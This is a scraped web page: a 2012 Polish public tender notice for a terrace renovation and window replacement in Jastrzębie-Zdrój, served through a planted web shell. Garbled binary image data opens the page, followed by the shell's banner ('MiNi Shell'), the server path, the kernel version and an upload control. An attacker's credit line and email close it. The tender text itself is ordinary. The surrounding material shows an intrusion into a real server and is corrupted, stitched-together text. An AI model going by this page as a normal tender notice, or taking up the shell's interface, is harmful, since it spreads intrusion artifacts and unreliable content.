JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120601/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120601/184296-N-2012.html

<p class="kh_header"><b>Jastrzębie-Zdrój: Remont tarasu wraz z robotami towarzyszącymi oraz wymiana stolarki okiennej 
i drzwiowej w budynku użytkowym przy ul. Wrzosowej 4A-8A-12A w Jastrzębiu-Zdroju</b><br>
<b>Numer ogłoszenia: 184296 - 2012; data zamieszczenia: 01.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Nieruchomości , ul. 1-go Maja 55, 44-330 Jastrzębie-Zdrój, woj. śląskie, tel. 032 4787001, faks 032 4762952.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzn.jastrzebie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont tarasu wraz z robotami towarzyszącymi oraz wymiana stolarki okiennej 
i drzwiowej w budynku użytkowym przy ul. Wrzosowej 4A-8A-12A w Jastrzębiu-Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3. Przedmiotem zamówienia jest jest wykonanie remontu tarasu od strony południowej pawilonu użytkowego przy ul. Wrzosowej 4A-8A-12A w Jastrzębiu-Zdroju wraz z wykonaniem zadaszenia oraz robotami towarzyszącymi, a także wymiana stolarki okiennej i drzwiowej w pawilonie wraz ze wszystkimi robotami towarzyszącymi niezbędnymi do wykonania całości zadania - zgodnie ze Specyfikacjami Technicznymi Wykonania i Odbioru Robót oraz Przedmiarami robót, które stanowią załączniki do SIWZ.
3.1. Zakres prac obejmuje:
3. 1.1 W zakresie remontu tarasu:
a) Remont posadzki tarasu:
1. skucie posadzki z lastryka,
2. skucie wylewki cementowej wraz z zerwaniem izolacji poziomej,
3. skucie cokołu cementowego na ścianie,
4.  rozebranie obróbek blacharskich,
5.  skucie betonowego zjazdu na wózki oraz betonowego stopnia przy wejściu na taras,
6.  rozbiórka drewnianych elementów balustrady,
7.  rozbiórka żelbetowej konstrukcji balustrady,
8.  zagruntowanie podłoża oraz wykonanie warstwy wyrównawczej pod izolację z papy termozgrzewalnej,
9.  zagruntowanie dwukrotne masą asfaltową podłoża,
10.  montaż obróbek blacharskich z blachy ocynkowanej (połączenia lutowane) z wykonaniem izolacji w miejscu zamocowania,
11.  montaż słupków balustrady za pomocą stalowych kotew samopodcinających do dużych obciążeń,
12.  wykonanie wylewki cementowej grubości 5-7cm wzmocnionej siatką stalową z wyprofilowaniem 1% spadku,
13.  zagruntowanie podłoża,
14.  ułożenie płytek gresowych na zaprawie klejowej mrozoodpornej o zwiększonej elastyczności i plastyczności,
15.  ułożenie płytek gresowych z kapinosem na krawędziach tarasu,
16.  wykonanie cokolika z płytek gresowych o wysokości 15cm,
17.  wykonanie stopni wejściowych z poziomu chodnika na poziom tarasu,
18.  wykonanie zjazdu na wózki,
19.  uszczelnienie styku obróbek blacharskich z płytkami,
20.  malowanie obróbek blacharskich farbą poliwinylową w kolorze szarym.
b) Zadaszenie tarasu i balustrada:
1.  montaż balustrady zgodnie z załączonymi do STWiOR rysunkami, 
2. ustawienie rusztowań ramowych oraz daszków ochronnych nad wejściami, przejściami,
3. montaż systemowego zadaszenia z profili aluminiowych z wypełnieniem płytami z poliwęglanu komorowego grubości 20 mm, zgodnie z załączonym do STWiOR rysunkiem,
4. montaż rynny dachowej z blachy ocynkowanej, lutowane, o przekroju prostokątnym wraz z podłączeniem do rury spustowej (kosz),
5. montaż rury spustowej ocynkowanej o przekroju fi 110 mocowanej w narożniku południowo-wschodnim ściany segmentu 8A,
6. podłączenie rury spustowej do rury PVC z czyszczakiem.
c) Naprawa i malowanie tynków:
1. odbicie luźnych tynków i uzupełnienie na ścianach, słupach, podciągach i stropach,
2. zagruntowanie podłoża,
3. przyklejenie jednej warstwy siatki na ścianach, słupach, podciągach i stropach.
4. ochrona narożników wypukłych kątownikiem metalowym,
6. zamocowanie aluminiowego profilu kapinosa na dolnej krawędzi płyty tarasu,
7. wykonanie wyprawy elewacyjnej z tynku silikonowego o fakturze ziarna 2mm,
8 malowanie farbami silikonowymi tynku w kolorze zbliżonym do elewacji wschodniej segm. 8A,
9. okładziny słupów płytkami na wysokość 30cm.
d) Roboty towarzyszące:
1. rozbiórka części chodnika na odcinku od narożnika ściany południowo-wschodniej segm. 8A do wpustu ulicznego,
2. wykop i ułożenie na podsypce piaskowej rury PVC 110 z podłączeniem do wpustu ulicznego i do rury spustowej na ścianie,
3. zasypanie i zagęszczenie wykopu oraz ułożenie kostki betonowej z rozbiórki, 
4. demontaż i montaż tablic reklamowych i informacyjnych,
5. ustawienie rusztowania i wykonanie daszków zabezpieczających,
6. oraz  inne roboty niezbędne do wykonania zadania jako całości.

3.1.2 W zakresie wymiany stolarki okiennej i drzwiowej:
Demontaż stolarki stalowej (witryny) o wymiarach wskazanych w STWiOR i montaż nowej wg załączonych do STWiOR szkiców, a także podział otworów okiennych słupkami z bloczków betonu komórkowego i montaż stolarki okiennej wg załączonych do STWiOR szkiców. Zakres prac obejmuje:
1. Rozebranie obróbek blacharskich zewnętrznych - parapetów z blachy ocynkowanej szer. ok. 30 cm.
2. Wykucie z muru istniejących okien i drzwi stalowych we wskazanych lokalach użytkowych. 
3. Uzupełnienie gładzi cementowej pod parapety zewnętrzne pochyło (wyprofilowanie spadku i wyrównanie podłoża).
4. Wykonanie podziału otworów okiennych poprzez murowanie słupków o wymiarach szerokości od 50 do 90cm i głębokości 30cm wg załączonych do STWiOR rysunków. Słupki wykonać z bloczków z betonu komórkowego.  Otwory dzielić w taki sposób aby murowane słupki łączyć z istniejącymi ścianami lub słupami wewnątrz budynku, zachowując przy tym równy podział powstających otworów okiennych - widok z zewnątrz.
5. Wykonanie tynków wewnętrznych i zewnętrznych na całości ościeży i wymurowanych słupkach wraz ze wzmocnieniem siatką z włókna szklanego.
6. Naprawa i wzmocnienie istniejących parapetów betonowych wewnętrznych o grubości 4-5cm i montaż parapetów nakładkowych PCW w kolorze białym.
7. Montaż parapetów zewnętrznych z blachy powlekanej 0,75 mm w kolorze RAL - 8019 wraz z zaślepkami PCW (należy wykonać z uwzględnieniem prawidłowego wysunięcia parapetów na kondygnacjach - zróżnicowanie wysięgu). Parapety montować z jednego odcinka blachy.
8. Montaż okien i drzwi zgodnie z wymaganymi parametrami technicznymi za pomocą systemowych kotew stalowych i kołków rozporowych - rozstaw zgodny z instrukcją producenta okien - instrukcję przed montażem należy dostarczyć Inspektorowi Nadzoru.. Przestrzeń pomiędzy ramą i murem uszczelnić pianką poliuretanową.
9. Wykonanie gładzi gipsowych na wewnętrznych powierzchniach tynkowanych.
10. Malowanie (2-krotne) ościeży wewnętrznych farbami wykonanych gładzi (kolor i rodzaj farby zbliżony do istniejącego).
11. Malowanie tynków ościeży zewnętrznych farbą emulsyjną elewacyjną 2-krotne (kolor zbliżony do istniejącego).
12. Wywóz gruzu spryzmowanego i elementów stolarki samochodami wraz z kosztem utylizacji odpadów. 

UWAGA: Przed przystąpieniem do produkcji stolarki wykonawca ma obowiązek przeprowadzenia wizji w budynku oraz dokonania niezbędnych pomiarów z natury uwzględniając nowy podział stolarki okiennej wg załączonych rysunków (widok z zewnątrz) oraz istniejących ścian i słupów wewnątrz budynku.
Ofertę z wyceną wykonania zadania należy oprzeć na własnych pomiarach i przeprowadzonej wizji w budynku, przy uwzględnieniu wszystkich materiałów niezbędnych do realizacji zadania.

3.1.3  Wymagania dodatkowe: 
 całość prac należy prowadzić w sposób umożliwiający korzystanie z obiektu przez użytkowników i petentów,
 podczas prowadzenia prac należy zabezpieczyć i oznakować  teren w miejscach wykonywania robót,
 roboty zanikowe podlegają odbiorowi przed ich zakryciem; wykonawca jest zobowiązany do powiadomienia inspektora nadzoru przynajmniej 2 dni przed planowanym przystąpieniem do prac.
 rozpoczęcie robót należy umówić z użytkownikami z podaniem terminu rozpoczęcia i zakończenia wymiany stolarki w poszczególnych lokalach użytkowych, w formie pisemnej (np. notatka służbowa),

Szczegłowy opis przedmiotu zamówienia zawierają STWiOR, a zakres ilościowy zawarty jest w przedmiarach robót. Dokumentacja ta jest integralnym załącznikiem do SIWZ oraz ogłoszenia o przetargu i jest dostępna na stronie internetowej Zamawiającego.
 
3.2. Wycena oferty winna być poprzedzona wizją lokalną i powinna uwzględniać wszystkie koszty i czynności niezbędne do wykonania przedmiotu  zamówienia zgodnie z prawem i najlepszą wiedzą techniczną..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.43.10.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga złożenia wadium w wysokości 6.000,00 zł  (słownie: sześć tysięcy złotych 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca udokumentuje wykonanie (zakończenie) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch robót z każdej z branż o charakterze i zakresie zgodnym z zamówieniem w zakresie (dopuszcza się odrębne referencje):
        a)       roboty ogólnobudowlane o wartości min. 50.000,00 zł brutto,
        b)       wymiana stolarki okiennej lub okiennej i drzwiowej o wartości min. 50.000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponować osobą przyjmującą obowiązki kierownika robót, posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej do kierowania robotami budowlanymi - bez ograniczeń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, iż jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę  min. 50.000,00 zł (odpowiedzialność do wysokości poniesionej szkody oszacowanej przez rzeczoznawcę, wraz z kosztami poniesionymi przez rzeczoznawcę). Jeżeli z w/w dokumentu nie wynika, że składka została opłacona, Wykonawca winien dołączyć potwierdzenie jej opłaty lub opłaty raty składki wymagalnej na dzień otwarcia ofert. Polisa winna być aktualna na dzień składania i otwarcia ofert. Wykonawca winien posiadać w/w ubezpieczenie przez okres wykonywania zamówienia. Ze względu na specyfikę zawierania umów ubezpieczeniowych, obejmujących okresy nie dłuższe niż jeden rok, dopuszczalne jest, po podpisaniu umowy, sukcesywne przedstawianie dowodów opłacenia polisy, bądź zawarcia nowej umowy na ubezpieczenie, przy czym nie później niż na 7 dni przed upływem terminu do którego polisa była zawarta bądź na 7 dni przed datą opłacenia składki.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Wypełniony druk OFERTA		
b) Dowód wpłaty wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie  możliwość dokonania zmian postanowień  niniejszej umowy:
a) jeżeli pomimo wystąpienia przez Wykonawcę z właściwie przygotowanym wnioskiem o wydanie decyzji administracyjnych lub warunków technicznych, lub innego dokumentu niezbędnego do prawidłowej realizacji przedmiotu umowy, w terminie przewidzianym w odrębnych przepisach, organ administracji publicznej lub inna instytucja nie wyda stosownego dokumentu. W takim przypadku termin wykonania przedmiotu umowy zostanie przesunięty o ilość dni zwłoki w wydaniu stosownego dokumentu;
b) Zamawiający z ważnych przyczyn, nie dających się przewidzieć w chwili zawarcia umowy, wstrzyma wykonywanie prac. W takim przypadku termin wykonania przedmiotu umowy zostanie przesunięty o ilość dni równą okresowi wstrzymania prac;
c)  w zakresie podwykonawców, wskazanych  na etapie  złożonej  oferty lub, których konieczność  ujawnienia wynikła na etapie realizacji zamówienia, którym wykonawca powierzył lub ma zamiar powierzyć wykonanie części zamówienia;
d) w zakresie osoby posiadającej wymagane uprawnienia w przypadku zaistnienia zdarzeń losowych (w takim przypadku Wykonawca będzie do zaproponowania osoby legitymującej się uprawnieniami wymaganymi w pkt 5.2.c SIWZ);
e) w zakresie zmiany terminu wykonania robót w przypadku niekorzystnych warunków atmosferycznych uniemożliwiających wykonanie robót w szczególności opadów deszczu trwających powyżej 5 kolejnych dni, niską temperaturą tzn. poniżej +50  Celsjusza,
f) w przypadku zmiany Inspektorów nadzoru,
g) w przypadku zmian kadrowo - personalnych, utraty wymaganych uprawnień, utraty stanowiska;
h) w przypadku wystąpienia okoliczności, których Zamawiający nie był w stanie przewidzieć, pomimo zachowania należytej staranności;
i) zmniejszenie zakresu wynagrodzenia z przyczyn o obiektywnym charakterze, istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia;
j) zakres rzeczowy zamówienia  określony umową może zostać ograniczony przez Zamawiającego, bez skutków finansowych i prawnych dla Zamawiającego, w przypadku gdy wykonanie przedmiotu  zamówienia w pełnym zakresie nie leży w interesie publicznym, czego nie można było wcześniej przewidzieć;
j) w przypadku zmiany  dotyczącej  nazw, siedziby Wykonawcy lub jego formy organizacyjno-prawnej                          w trakcie trwania umowy, numerów kont bankowych oraz innych danych identyfikacyjnych;
k) w przypadku zmian prowadzących do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy;
l) Wykonawca z własnej inicjatywy proponuje zmianę osoby wyszczególnionej w § 6 ust. 2 umowy                          w następujących przypadkach:
- śmierci, choroby lub innych zdarzeń losowych;
- jeżeli zmiana tych osób stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy.
W przypadku zmiany tych osób umowy, nowe osoby powołane do pełnienia ww. obowiązków muszą spełniać wymagania określone w specyfikacji istotnych warunków zamówienia dla danej funkcji;
ł) Zamawiający może także zażądać od Wykonawcy zmiany osób, o których mowa osoby wyszczególnionej w § 6 ust. 2  umowy, jeżeli uzna, że nie wykonują należycie swoich obowiązków. Wykonawca zobowiązany jest dokonać zmiany tych osób w terminie nie dłuższym niż 7 dni od daty złożenia wniosku Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzn.jastrzebie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Nieruchomości
Adres: 44-330 Jastrzębie-Zdrój, ul. 1 Maja 55.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2012 godzina 09:00, miejsce: Miejski Zarząd Nieruchomości
Adres: 44-330 Jastrzębie-Zdrój, ul. 1 Maja 55, pok. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com